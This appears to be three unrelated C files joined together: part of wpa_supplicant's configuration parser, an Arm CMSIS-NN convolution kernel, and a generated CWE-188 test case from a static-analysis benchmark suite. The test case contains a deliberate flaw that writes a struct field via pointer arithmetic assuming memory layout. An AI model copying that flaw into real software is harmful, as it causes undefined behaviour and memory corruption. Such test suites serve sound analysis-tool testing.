(tmp == NULL) { wpa_printf(MSG_ERROR, "Line %d: failed to parse %s", line, data->name); return -1; } res = wpa_global_config_parse_str(data, config, line, tmp); os_free(tmp); return res; } static int wpa_global_config_parse_bin(const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { size_t len; struct wpabuf **dst, *tmp; len = os_strlen(pos); if (len & 0x01) return -1; tmp = wpabuf_alloc(len / 2); if (tmp == NULL) return -1; if (hexstr2bin(pos, wpabuf_put(tmp, len / 2), len / 2)) { wpabuf_free(tmp); return -1; } dst = (struct wpabuf **) (((u8 *) config) + (long) data->param1); wpabuf_free(*dst); *dst = tmp; wpa_printf(MSG_DEBUG, "%s", data->name); return 0; } static int wpa_config_process_freq_list(const struct global_parse_data *data, struct wpa_config *config, int line, const char *value) { int *freqs; freqs = wpa_config_parse_int_array(value); if (freqs == NULL) return -1; if (freqs[0] == 0) { os_free(freqs); freqs = NULL; } os_free(config->freq_list); config->freq_list = freqs; return 0; } #ifdef CONFIG_P2P static int wpa_global_config_parse_ipv4(const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { u32 *dst; struct hostapd_ip_addr addr; if (hostapd_parse_ip_addr(pos, &addr) < 0) return -1; if (addr.af != AF_INET) return -1; dst = (u32 *) (((u8 *) config) + (long) data->param1); os_memcpy(dst, &addr.u.v4.s_addr, 4); wpa_printf(MSG_DEBUG, "%s = 0x%x", data->name, WPA_GET_BE32((u8 *) dst)); return 0; } #endif /* CONFIG_P2P */ static int wpa_config_process_country(const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { if (!pos[0] || !pos[1]) { wpa_printf(MSG_DEBUG, "Invalid country set"); return -1; } config->country[0] = pos[0]; config->country[1] = pos[1]; wpa_printf(MSG_DEBUG, "country='%c%c'", config->country[0], config->country[1]); return 0; } static int wpa_config_process_load_dynamic_eap( const struct global_parse_data *data, struct wpa_config *config, int line, const char *so) { int ret; wpa_printf(MSG_DEBUG, "load_dynamic_eap=%s", so); ret = eap_peer_method_load(so); if (ret == -2) { wpa_printf(MSG_DEBUG, "This EAP type was already loaded - not " "reloading."); } else if (ret) { wpa_printf(MSG_ERROR, "Line %d: Failed to load dynamic EAP " "method '%s'.", line, so); return -1; } return 0; } #ifdef CONFIG_WPS static int wpa_config_process_uuid(const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { char buf[40]; if (uuid_str2bin(pos, config->uuid)) { wpa_printf(MSG_ERROR, "Line %d: invalid UUID", line); return -1; } uuid_bin2str(config->uuid, buf, sizeof(buf)); wpa_printf(MSG_DEBUG, "uuid=%s", buf); return 0; } static int wpa_config_process_device_type( const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { return wps_dev_type_str2bin(pos, config->device_type); } static int wpa_config_process_os_version(const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { if (hexstr2bin(pos, config->os_version, 4)) { wpa_printf(MSG_ERROR, "Line %d: invalid os_version", line); return -1; } wpa_printf(MSG_DEBUG, "os_version=%08x", WPA_GET_BE32(config->os_version)); return 0; } static int wpa_config_process_wps_vendor_ext_m1( const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { struct wpabuf *tmp; int len = os_strlen(pos) / 2; u8 *p; if (!len) { wpa_printf(MSG_ERROR, "Line %d: " "invalid wps_vendor_ext_m1", line); return -1; } tmp = wpabuf_alloc(len); if (tmp) { p = wpabuf_put(tmp, len); if (hexstr2bin(pos, p, len)) { wpa_printf(MSG_ERROR, "Line %d: " "invalid wps_vendor_ext_m1", line); wpabuf_free(tmp); return -1; } wpabuf_free(config->wps_vendor_ext_m1); config->wps_vendor_ext_m1 = tmp; } else { wpa_printf(MSG_ERROR, "Can not allocate " "memory for wps_vendor_ext_m1"); return -1; } return 0; } #endif /* CONFIG_WPS */ #ifdef CONFIG_P2P static int wpa_config_process_sec_device_type( const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { int idx; if (config->num_sec_device_types >= MAX_SEC_DEVICE_TYPES) { wpa_printf(MSG_ERROR, "Line %d: too many sec_device_type " "items", line); return -1; } idx = config->num_sec_device_types; if (wps_dev_type_str2bin(pos, config->sec_device_type[idx])) return -1; config->num_sec_device_types++; return 0; } static int wpa_config_process_p2p_pref_chan( const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { struct p2p_channel *pref = NULL, *n; unsigned int num = 0; const char *pos2; u8 op_class, chan; /* format: class:chan,class:chan,... */ while (*pos) { op_class = atoi(pos); pos2 = os_strchr(pos, ':'); if (pos2 == NULL) goto fail; pos2++; chan = atoi(pos2); n = os_realloc_array(pref, num + 1, sizeof(struct p2p_channel)); if (n == NULL) goto fail; pref = n; pref[num].op_class = op_class; pref[num].chan = chan; num++; pos = os_strchr(pos2, ','); if (pos == NULL) break; pos++; } os_free(config->p2p_pref_chan); config->p2p_pref_chan = pref; config->num_p2p_pref_chan = num; wpa_hexdump(MSG_DEBUG, "P2P: Preferred class/channel pairs", (u8 *) config->p2p_pref_chan, config->num_p2p_pref_chan * sizeof(struct p2p_channel)); return 0; fail: os_free(pref); wpa_printf(MSG_ERROR, "Line %d: Invalid p2p_pref_chan list", line); return -1; } static int wpa_config_process_p2p_no_go_freq( const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { int ret; ret = freq_range_list_parse(&config->p2p_no_go_freq, pos); if (ret < 0) { wpa_printf(MSG_ERROR, "Line %d: Invalid p2p_no_go_freq", line); return -1; } wpa_printf(MSG_DEBUG, "P2P: p2p_no_go_freq with %u items", config->p2p_no_go_freq.num); return 0; } #endif /* CONFIG_P2P */ static int wpa_config_process_hessid( const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { if (hwaddr_aton2(pos, config->hessid) < 0) { wpa_printf(MSG_ERROR, "Line %d: Invalid hessid '%s'", line, pos); return -1; } return 0; } static int wpa_config_process_sae_groups( const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { int *groups = wpa_config_parse_int_array(pos); if (groups == NULL) { wpa_printf(MSG_ERROR, "Line %d: Invalid sae_groups '%s'", line, pos); return -1; } os_free(config->sae_groups); config->sae_groups = groups; return 0; } static int wpa_config_process_ap_vendor_elements( const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { struct wpabuf *tmp; int len = os_strlen(pos) / 2; u8 *p; if (!len) { wpa_printf(MSG_ERROR, "Line %d: invalid ap_vendor_elements", line); return -1; } tmp = wpabuf_alloc(len); if (tmp) { p = wpabuf_put(tmp, len); if (hexstr2bin(pos, p, len)) { wpa_printf(MSG_ERROR, "Line %d: invalid " "ap_vendor_elements", line); wpabuf_free(tmp); return -1; } wpabuf_free(config->ap_vendor_elements); config->ap_vendor_elements = tmp; } else { wpa_printf(MSG_ERROR, "Cannot allocate memory for " "ap_vendor_elements"); return -1; } return 0; } #ifdef CONFIG_CTRL_IFACE static int wpa_config_process_no_ctrl_interface( const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { wpa_printf(MSG_DEBUG, "no_ctrl_interface -> ctrl_interface=NULL"); os_free(config->ctrl_interface); config->ctrl_interface = NULL; return 0; } #endif /* CONFIG_CTRL_IFACE */ #ifdef OFFSET #undef OFFSET #endif /* OFFSET */ /* OFFSET: Get offset of a variable within the wpa_config structure */ #define OFFSET(v) ((void *) &((struct wpa_config *) 0)->v) #define FUNC(f) #f, wpa_config_process_ ## f, OFFSET(f), NULL, NULL #define FUNC_NO_VAR(f) #f, wpa_config_process_ ## f, NULL, NULL, NULL #define _INT(f) #f, wpa_global_config_parse_int, OFFSET(f) #define INT(f) _INT(f), NULL, NULL #define INT_RANGE(f, min, max) _INT(f), (void *) min, (void *) max #define _STR(f) #f, wpa_global_config_parse_str, OFFSET(f) #define STR(f) _STR(f), NULL, NULL #define STR_RANGE(f, min, max) _STR(f), (void *) min, (void *) max #define BIN(f) #f, wpa_global_config_parse_bin, OFFSET(f), NULL, NULL #define IPV4(f) #f, wpa_global_config_parse_ipv4, OFFSET(f), NULL, NULL static const struct global_parse_data global_fields[] = { #ifdef CONFIG_CTRL_IFACE { STR(ctrl_interface), 0 }, { FUNC_NO_VAR(no_ctrl_interface), 0 }, { STR(ctrl_interface_group), 0 } /* deprecated */, #endif /* CONFIG_CTRL_IFACE */ #ifdef CONFIG_MACSEC { INT_RANGE(eapol_version, 1, 3), 0 }, #else /* CONFIG_MACSEC */ { INT_RANGE(eapol_version, 1, 2), 0 }, #endif /* CONFIG_MACSEC */ { INT(ap_scan), 0 }, { FUNC(bgscan), 0 }, { INT(disable_scan_offload), 0 }, { INT(fast_reauth), 0 }, { STR(opensc_engine_path), 0 }, { STR(pkcs11_engine_path), 0 }, { STR(pkcs11_module_path), 0 }, { STR(openssl_ciphers), 0 }, { STR(pcsc_reader), 0 }, { STR(pcsc_pin), 0 }, { INT(external_sim), 0 }, { STR(driver_param), 0 }, { INT(dot11RSNAConfigPMKLifetime), 0 }, { INT(dot11RSNAConfigPMKReauthThreshold), 0 }, { INT(dot11RSNAConfigSATimeout), 0 }, #ifndef CONFIG_NO_CONFIG_WRITE { INT(update_config), 0 }, #endif /* CONFIG_NO_CONFIG_WRITE */ { FUNC_NO_VAR(load_dynamic_eap), 0 }, #ifdef CONFIG_WPS { FUNC(uuid), CFG_CHANGED_UUID }, { STR_RANGE(device_name, 0, 32), CFG_CHANGED_DEVICE_NAME }, { STR_RANGE(manufacturer, 0, 64), CFG_CHANGED_WPS_STRING }, { STR_RANGE(model_name, 0, 32), CFG_CHANGED_WPS_STRING }, { STR_RANGE(model_number, 0, 32), CFG_CHANGED_WPS_STRING }, { STR_RANGE(serial_number, 0, 32), CFG_CHANGED_WPS_STRING }, { FUNC(device_type), CFG_CHANGED_DEVICE_TYPE }, { FUNC(os_version), CFG_CHANGED_OS_VERSION }, { STR(config_methods), CFG_CHANGED_CONFIG_METHODS }, { INT_RANGE(wps_cred_processing, 0, 2), 0 }, { FUNC(wps_vendor_ext_m1), CFG_CHANGED_VENDOR_EXTENSION }, #endif /* CONFIG_WPS */ #ifdef CONFIG_P2P { FUNC(sec_device_type), CFG_CHANGED_SEC_DEVICE_TYPE }, { INT(p2p_listen_reg_class), 0 }, { INT(p2p_listen_channel), 0 }, { INT(p2p_oper_reg_class), CFG_CHANGED_P2P_OPER_CHANNEL }, { INT(p2p_oper_channel), CFG_CHANGED_P2P_OPER_CHANNEL }, { INT_RANGE(p2p_go_intent, 0, 15), 0 }, { STR(p2p_ssid_postfix), CFG_CHANGED_P2P_SSID_POSTFIX }, { INT_RANGE(persistent_reconnect, 0, 1), 0 }, { INT_RANGE(p2p_intra_bss, 0, 1), CFG_CHANGED_P2P_INTRA_BSS }, { INT(p2p_group_idle), 0 }, { INT_RANGE(p2p_passphrase_len, 8, 63), CFG_CHANGED_P2P_PASSPHRASE_LEN }, { FUNC(p2p_pref_chan), CFG_CHANGED_P2P_PREF_CHAN }, { FUNC(p2p_no_go_freq), CFG_CHANGED_P2P_PREF_CHAN }, { INT_RANGE(p2p_add_cli_chan, 0, 1), 0 }, { INT_RANGE(p2p_optimize_listen_chan, 0, 1), 0 }, { INT(p2p_go_ht40), 0 }, { INT(p2p_go_vht), 0 }, { INT(p2p_disabled), 0 }, { INT(p2p_no_group_iface), 0 }, { INT_RANGE(p2p_ignore_shared_freq, 0, 1), 0 }, { IPV4(ip_addr_go), 0 }, { IPV4(ip_addr_mask), 0 }, { IPV4(ip_addr_start), 0 }, { IPV4(ip_addr_end), 0 }, #endif /* CONFIG_P2P */ { FUNC(country), CFG_CHANGED_COUNTRY }, { INT(bss_max_count), 0 }, { INT(bss_expiration_age), 0 }, { INT(bss_expiration_scan_count), 0 }, { INT_RANGE(filter_ssids, 0, 1), 0 }, { INT_RANGE(filter_rssi, -100, 0), 0 }, { INT(max_num_sta), 0 }, { INT_RANGE(disassoc_low_ack, 0, 1), 0 }, #ifdef CONFIG_HS20 { INT_RANGE(hs20, 0, 1), 0 }, #endif /* CONFIG_HS20 */ { INT_RANGE(interworking, 0, 1), 0 }, { FUNC(hessid), 0 }, { INT_RANGE(access_network_type, 0, 15), 0 }, { INT_RANGE(pbc_in_m1, 0, 1), 0 }, { STR(autoscan), 0 }, { INT_RANGE(wps_nfc_dev_pw_id, 0x10, 0xffff), CFG_CHANGED_NFC_PASSWORD_TOKEN }, { BIN(wps_nfc_dh_pubkey), CFG_CHANGED_NFC_PASSWORD_TOKEN }, { BIN(wps_nfc_dh_privkey), CFG_CHANGED_NFC_PASSWORD_TOKEN }, { BIN(wps_nfc_dev_pw), CFG_CHANGED_NFC_PASSWORD_TOKEN }, { STR(ext_password_backend), CFG_CHANGED_EXT_PW_BACKEND }, { INT(p2p_go_max_inactivity), 0 }, { INT_RANGE(auto_interworking, 0, 1), 0 }, { INT(okc), 0 }, { INT(pmf), 0 }, { FUNC(sae_groups), 0 }, { INT(dtim_period), 0 }, { INT(beacon_int), 0 }, { FUNC(ap_vendor_elements), 0 }, { INT_RANGE(ignore_old_scan_res, 0, 1), 0 }, { FUNC(freq_list), 0 }, { INT(scan_cur_freq), 0 }, { INT(sched_scan_interval), 0 }, { INT(tdls_external_control), 0}, { STR(osu_dir), 0 }, { STR(wowlan_triggers), 0 }, { INT(p2p_search_delay), 0}, { INT(mac_addr), 0 }, { INT(rand_addr_lifetime), 0 }, { INT(preassoc_mac_addr), 0 }, }; #undef FUNC #undef _INT #undef INT #undef INT_RANGE #undef _STR #undef STR #undef STR_RANGE #undef BIN #undef IPV4 #define NUM_GLOBAL_FIELDS ARRAY_SIZE(global_fields) int wpa_config_process_global(struct wpa_config *config, char *pos, int line) { size_t i; int ret = 0; for (i = 0; i < NUM_GLOBAL_FIELDS; i++) { const struct global_parse_data *field = &global_fields[i]; size_t flen = os_strlen(field->name); if (os_strncmp(pos, field->name, flen) != 0 || pos[flen] != '=') continue; if (field->parser(field, config, line, pos + flen + 1)) { wpa_printf(MSG_ERROR, "Line %d: failed to " "parse '%s'.", line, pos); ret = -1; } if (field->changed_flag == CFG_CHANGED_NFC_PASSWORD_TOKEN) config->wps_nfc_pw_from_config = 1; config->changed_parameters |= field->changed_flag; break; } if (i == NUM_GLOBAL_FIELDS) { #ifdef CONFIG_AP if (os_strncmp(pos, "wmm_ac_", 7) == 0) { char *tmp = os_strchr(pos, '='); if (tmp == NULL) { if (line < 0) return -1; wpa_printf(MSG_ERROR, "Line %d: invalid line " "'%s'", line, pos); return -1; } *tmp++ = '\0'; if (hostapd_config_wmm_ac(config->wmm_ac_params, pos, tmp)) { wpa_printf(MSG_ERROR, "Line %d: invalid WMM " "AC item", line); return -1; } } #endif /* CONFIG_AP */ if (line < 0) return -1; wpa_printf(MSG_ERROR, "Line %d: unknown global field '%s'.", line, pos); ret = -1; } return ret; }
292899.c
/* * Copyright (C) 2010-2018 Arm Limited or its affiliates. All rights reserved. * * SPDX-License-Identifier: Apache-2.0 * * Licensed under the Apache License, Version 2.0 (the License); you may * not use this file except in compliance with the License. * You may obtain a copy of the License at * * www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an AS IS BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ /* ---------------------------------------------------------------------- * Project: CMSIS NN Library * Title: arm_nn_mat_mult_kernel_q7_q15_reordered.c * Description: Matrix-multiplication function for convolution with reordered columns * * $Date: 17. January 2018 * $Revision: V.1.0.0 * * Target Processor: Cortex-M cores * -------------------------------------------------------------------- */ #include "arm_nnfunctions.h" #include "arm_math.h" /** * @brief Matrix-multiplication function for convolution with re-ordered input. * * @details Refer to header file for details. * */ q7_t *arm_nn_mat_mult_kernel_q7_q15_reordered(const q7_t * pA, const q15_t * pInBuffer, const uint16_t ch_im_out, const uint16_t numCol_A, const uint16_t bias_shift, const uint16_t out_shift, const q7_t * bias, q7_t * pOut) { #if defined (ARM_MATH_DSP) /* set up the second output pointers */ q7_t *pOut2 = pOut + ch_im_out; int i; /* this loop over rows in A */ for (i = 0; i < ch_im_out; i += 2) { /* setup pointers for B */ const q15_t *pB = pInBuffer; const q15_t *pB2 = pB + numCol_A; /* align the second pointer for A */ const q7_t *pA2 = pA + numCol_A; /* init the sum with bias */ q31_t sum = ((q31_t)(bias[i]) << bias_shift) + NN_ROUND(out_shift); q31_t sum2 = ((q31_t)(bias[i]) << bias_shift) + NN_ROUND(out_shift); q31_t sum3 = ((q31_t)(bias[i + 1]) << bias_shift) + NN_ROUND(out_shift); q31_t sum4 = ((q31_t)(bias[i + 1]) << bias_shift) + NN_ROUND(out_shift); uint16_t colCnt = numCol_A >> 2; /* accumulate over the vector */ while (colCnt) { q31_t inA11, inA12, inA21, inA22; q31_t inB1 = *__SIMD32(pB)++; q31_t inB2 = *__SIMD32(pB2)++; pA = read_and_pad_reordered(pA, &inA11, &inA12); pA2 = read_and_pad_reordered(pA2, &inA21, &inA22); sum = __SMLAD(inA11, inB1, sum); sum2 = __SMLAD(inA11, inB2, sum2); sum3 = __SMLAD(inA21, inB1, sum3); sum4 = __SMLAD(inA21, inB2, sum4); inB1 = *__SIMD32(pB)++; inB2 = *__SIMD32(pB2)++; sum = __SMLAD(inA12, inB1, sum); sum2 = __SMLAD(inA12, inB2, sum2); sum3 = __SMLAD(inA22, inB1, sum3); sum4 = __SMLAD(inA22, inB2, sum4); colCnt--; } /* while over colCnt */ colCnt = numCol_A & 0x3; while (colCnt) { q7_t inA1 = *pA++; q15_t inB1 = *pB++; q7_t inA2 = *pA2++; q15_t inB2 = *pB2++; sum += inA1 * inB1; sum2 += inA1 * inB2; sum3 += inA2 * inB1; sum4 += inA2 * inB2; colCnt--; } /* while over colCnt */ *pOut++ = (q7_t) __SSAT((sum >> out_shift), 8); *pOut++ = (q7_t) __SSAT((sum3 >> out_shift), 8); *pOut2++ = (q7_t) __SSAT((sum2 >> out_shift), 8); *pOut2++ = (q7_t) __SSAT((sum4 >> out_shift), 8); /* skip the row computed with A2 */ pA += numCol_A; } /* for over ch_im_out */ pOut += ch_im_out; /* return the new output pointer with offset */ return pOut; #else /* To be completed */ return NULL; #endif /* ARM_MATH_DSP */ }
195432.c
/* TEMPLATE GENERATED TESTCASE FILE Filename: CWE188_Reliance_On_Data_Memory_Layout__modify_local_18.c Label Definition File: CWE188_Reliance_On_Data_Memory_Layout.label.xml Template File: point-flaw-18.tmpl.c */ /* * @description * CWE: 188 Reliance on Data Memory Layout * Sinks: modify_local * GoodSink: Modify the second field of the struct using the field name * BadSink : Attempt to modify second field in struct, assuming the first field is an int * Flow Variant: 18 Control flow: goto statements * * */ #include "std_testcase.h" #ifndef OMITBAD void CWE188_Reliance_On_Data_Memory_Layout__modify_local_18_bad() { goto sink; /* INCIDENTAL: CWE 561 Dead Code, the code below will never run */ { struct { char first; int second; } s; s.first = 1; /* FIX: Do not make unwarranted assumptions about underlying data model * Modify and access data appropriately */ s.second = 5; printIntLine(s.first); printIntLine(s.second); } sink: { struct { char first; int second; } s; char *c; s.first = 1; c = &s.first; /* FLAW: Attempt to modify 'second' assuming second comes after first and * is aligned on an int-boundary after first */ *(int*)(c + sizeof(int)) = 5; printIntLine(s.first); printIntLine(s.second); } } #endif /* OMITBAD */ #ifndef OMITGOOD /* good1() reverses the blocks on the goto statement */ static void good1() { goto sink; /* INCIDENTAL: CWE 561 Dead Code, the code below will never run */ { struct { char first; int second; } s; char *c; s.first = 1; c = &s.first; /* FLAW: Attempt to modify 'second' assuming second comes after first and * is aligned on an int-boundary after first */ *(int*)(c + sizeof(int)) = 5; printIntLine(s.first); printIntLine(s.second); } sink: { struct { char first; int second; } s; s.first = 1; /* FIX: Do not make unwarranted assumptions about underlying data model * Modify and access data appropriately */ s.second = 5; printIntLine(s.first); printIntLine(s.second); } } void CWE188_Reliance_On_Data_Memory_Layout__modify_local_18_good() { good1(); } #endif /* OMITGOOD */ /* Below is the main(). It is only used when building this testcase on its own for testing or for building a binary to use in testing binary analysis tools. It is not used when compiling all the testcases as one application, which is how source code analysis tools are tested. */ #ifdef INCLUDEMAIN int main(int argc, char * argv[]) { /* seed randomness */ srand( (unsigned)time(NULL) ); #ifndef OMITGOOD printLine("Calling good()..."); CWE188_Reliance_On_Data_Memory_Layout__modify_local_18_good(); printLine("Finished good()"); #endif /* OMITGOOD */ #ifndef OMITBAD printLine("Calling bad()..."); CWE188_Reliance_On_Data_Memory_Layout__modify_local_18_bad(); printLine("Finished bad()"); #endif /* OMITBAD */ return 0; } #endif